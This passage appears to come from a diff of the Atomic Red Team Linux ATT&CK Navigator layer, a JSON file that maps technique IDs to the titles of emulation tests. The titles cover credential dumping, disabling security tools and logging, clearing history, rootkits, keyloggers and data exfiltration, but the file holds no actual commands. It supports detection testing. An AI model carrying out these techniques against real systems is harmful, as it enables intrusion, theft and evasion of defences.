binary\n- Provide the SetUID capability to a file\n- Do reconnaissance for files that have the setuid bit set\n- Do reconnaissance for files that have the setgid bit set\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":3,"enabled":true,"comment":"\n- Sudo usage\n- Unlimited sudo cache timeout\n- Disable tty_tickets for sudo caching\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":3,"enabled":true,"comment":"\n- Find AWS credentials\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":1,"enabled":true,"comment":"\n- Search Through Bash History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":4,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with CP\n- Copy Private SSH Keys with rsync\n- Copy the users GnuPG directory with rsync\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- Cat the contents of a Kubernetes service account token file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":2,"enabled":true,"comment":"\n- Install root CA on CentOS/RHEL\n- Install root CA on Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.003","score":1,"enabled":true,"comment":"\n- LaZagne.py - Dump Credentials from Firefox Browser\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1556","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.003","score":2,"enabled":true,"comment":"\n- Malicious PAM rule\n- Malicious PAM module\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n- Encrypts collected data with AES-256 and Base64\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"comment":"\n- Compressing data using GZip in Python (FreeBSD/Linux)\n- Compressing data using bz2 in Python (FreeBSD/Linux)\n- Compressing data using zipfile in Python (FreeBSD/Linux)\n- Compressing data using tarfile in Python (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":35,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Disable journal logging via systemctl utility\n- Disable journal logging via sed utility\n"},{"techniqueID":"T1562.001","score":10,"enabled":true,"comment":"\n- Disable syslog\n- Disable Cb Response\n- Disable SELinux\n- Stop Crowdstrike Falcon on Linux\n- Clear History\n- Suspend History\n- Reboot Linux Host via Kernel System Request\n- Clear Pagging Cache\n- Disable Memory Swap\n- Tamper with Defender ATP on Linux/MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":7,"enabled":true,"comment":"\n- Disable history collection\n- Mac HISTCONTROL\n- Clear bash history\n- Setting the HISTCONTROL environment variable\n- Setting the HISTFILESIZE environment variable\n- Setting the HISTFILE environment variable\n- Setting the HISTIGNORE environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":11,"enabled":true,"comment":"\n- Stop/Start UFW firewall\n- Stop/Start UFW firewall systemctl\n- Turn off UFW logging\n- Add and delete UFW firewall rules\n- Edit UFW firewall user.rules file\n- Edit UFW firewall ufw.conf file\n- Edit UFW firewall sysctl.conf file\n- Edit UFW firewall main configuration file\n- Tail the UFW firewall log file\n- Disable iptables\n- Modify/delete iptables firewall rules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":2,"enabled":true,"comment":"\n- Auditing Configuration Changes on Linux Host\n- Logging Configuration Changes on Linux Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":1,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":1,"enabled":true,"comment":"\n- psexec.py (Impacket)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":2,"enabled":true,"comment":"\n- Shared Library Injection via /etc/ld.so.preload\n- Shared Library Injection via LD_PRELOAD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1614","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":4,"enabled":true,"comment":"\n- Discover System Language with locale\n- Discover System Language with localectl\n- Discover System Language by locale file\n- Discover System Language by Environment Variable Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Linux)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Linux"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"comment":"\n- Dump individual process memory with sh (Local)\n- Dump individual process memory with sh on FreeBSD (Local)\n- Dump individual process memory with Python (Local)\n- Capture Passwords with MimiPenguin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"comment":"\n- Access /etc/shadow (Local)\n- Access /etc/master.passwd (Local)\n- Access /etc/passwd (Local)\n- Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat\n- Access /etc/{shadow,passwd,master.passwd} with shell builtins\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery - systemctl\n- System Service Discovery - service\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"comment":"\n- Loadable Kernel Module based Rootkit\n- Loadable Kernel Module based Rootkit\n- dynamic-linker based rootkit (libprocesshider)\n- Loadable Kernel Module based Rootkit (Diamorphine)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":2,"enabled":true,"comment":"\n- System Network Configuration Discovery\n- System Network Configuration Discovery (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":6,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n- Remote System Discovery - ip neighbour\n- Remote System Discovery - ip route\n- Remote System Discovery - netstat\n- Remote System Discovery - ip tcp_metrics\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":2,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n- Pad Binary to Change Hash using truncate command - Linux/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX (linux)\n- Binary packed by UPX, with modified headers (linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":1,"enabled":true,"comment":"\n- Masquerading as FreeBSD or Linux crond process.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":1,"enabled":true,"comment":"\n- linux rename /proc/pid/comm using prctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"comment":"\n- Space After Filename\n- Space After Filename (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"comment":"\n- rc.common\n- rc.local\n- rc.local (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":8,"enabled":true,"comment":"\n- Packet Capture Linux using tshark or tcpdump\n- Packet Capture FreeBSD using tshark or tcpdump\n- Packet Capture FreeBSD using /dev/bpfN with sudo\n- Filtered Packet Capture FreeBSD using /dev/bpfN with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo\n- Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo\n- Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":3,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n- Port Scan Nmap for FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl freebsd,linux or macos\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":4,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - DNS\n- Python3 http.server\n- Python3 http.server (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery FreeBSD, Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"comment":"\n- At - Schedule a job\n- At - Schedule a job freebsd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n- Cron - Add script to /etc/cron.d folder\n- Cron - Add script to /var/spool/cron/crontabs/ folder\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"comment":"\n- Create Systemd Service and Timer\n- Create a user level transient systemd service and timer\n- Create a system level transient systemd service and timer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1056","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":6,"enabled":true,"comment":"\n- Living off the land Terminal Input Capture on Linux with pam.d\n- Logging bash history to syslog\n- Logging sh history to syslog/messages\n- Bash session based keylogger\n- SSHD PAM keylogger\n- Auditd keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.004","score":17,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n- Harvest SUID executable files\n- LinEnum tool execution\n- New script file in the tmp directory\n- What shell is running\n- What shells are available\n- Command line scripts\n- Obfuscated command line scripts\n- Obfuscated command line scripts (freebsd)\n- Change login shell\n- Change login shell (freebsd)\n- Environment variable scripts\n- Environment variable scripts (freebsd)\n- Detecting pipe-to-shell\n- Detecting pipe-to-shell (freebsd)\n- Current kernel information enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"comment":"\n- Execute shell script via python's command mode arguement\n- Execute Python via scripts\n- Execute Python via Python executables\n- Python pty module and spawn function used to spawn sh or bash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":36,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":9,"enabled":true,"comment":"\n- rm -rf\n- rm -rf\n- Truncate system log files via truncate utility (freebsd)\n- Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)\n- Overwrite FreeBSD system log via echo utility\n- Delete system log files via unlink utility (freebsd)\n- Delete system journal logs via rm and journalctl utilities\n- Overwrite Linux Mail Spool\n- Overwrite Linux Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":16,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear sh history (rm)\n- Clear Bash history (echo)\n- Clear sh history (echo)\n- Clear Bash history (cat dev/null)\n- Clear sh history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear sh history (ln dev/null)\n- Clear Bash history (truncate)\n- Clear sh history (truncate)\n- Clear history of a bunch of shells\n- Clear history of a bunch of shells (freebsd)\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n- Disable Bash History Logging with SSH -T\n- Disable sh History Logging with SSH -T (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":5,"enabled":true,"comment":"\n- Delete a single file - FreeBSD/Linux/macOS\n- Delete an entire folder - FreeBSD/Linux/macOS\n- Overwrite and delete a file with shred\n- Delete Filesystem - Linux\n- Delete Filesystem - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Linux\n- Copy and Modify Mailbox Data on Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n- Stage data from Discovery.sh (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.003","score":6,"enabled":true,"comment":"\n- Create local account (Linux)\n- Create local account (FreeBSD)\n- Reactivate a locked/expired account (Linux)\n- Reactivate a locked/expired account (FreeBSD)\n- Login as nobody (Linux)\n- Login as nobody (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":8,"enabled":true,"comment":"\n- List OS Information\n- Linux VM Check via Hardware\n- Linux VM Check via Kernel Modules\n- FreeBSD VM Check via Kernel Modules\n- Hostname Discovery\n- Environment variables discovery on freebsd, macos and linux\n- Linux List Kernel Modules\n- FreeBSD List Kernel Modules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":7,"enabled":true,"comment":"\n- Enumerate all accounts (Local)\n- View sudoers access\n- View accounts with UID 0\n- List opened files by user\n- Show if a user account has ever logged in remotely\n- Show if a user account has ever logged in remotely (freebsd)\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- Connection Proxy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Tor Proxy Usage - Debian/Ubuntu\n- Tor Proxy Usage - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":8,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n- Linux Download File and Run\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- SUDO Brute Force - Debian\n- SUDO Brute Force - Redhat\n- SUDO Brute Force - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.004","score":2,"enabled":true,"comment":"\n- SSH Credential Stuffing From Linux\n- SSH Credential Stuffing From FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":4,"enabled":true,"comment":"\n- X Windows Capture\n- X Windows Capture (freebsd)\n- Capture Linux Desktop using Import Tool\n- Capture Linux Desktop using Import Tool (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Add or copy content to clipboard with xClip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":1,"enabled":true,"comment":"\n- System Time Discovery in FreeBSD/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":2,"enabled":true,"comment":"\n- Base64 Encoded data.\n- Base64 Encoded data (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":2,"enabled":true,"comment":"\n- Network Share Discovery - linux\n- Network Share Discovery - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a user account on a Linux system\n- Create a user account on a FreeBSD system\n- Create a new user in Linux with `root` UID and GID.\n- Create a new user in FreeBSD with `root` GID.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":2,"enabled":true,"comment":"\n- Active Directory Create Admin Account\n- Active Directory Create User Account (Non-elevated)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1140","score":8,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Base64 decoding with shell utilities (freebsd)\n- FreeBSD b64encode Shebang in CLI\n- Hex decoding with shell utilities\n- Linux Base64 Encoded Shebang in 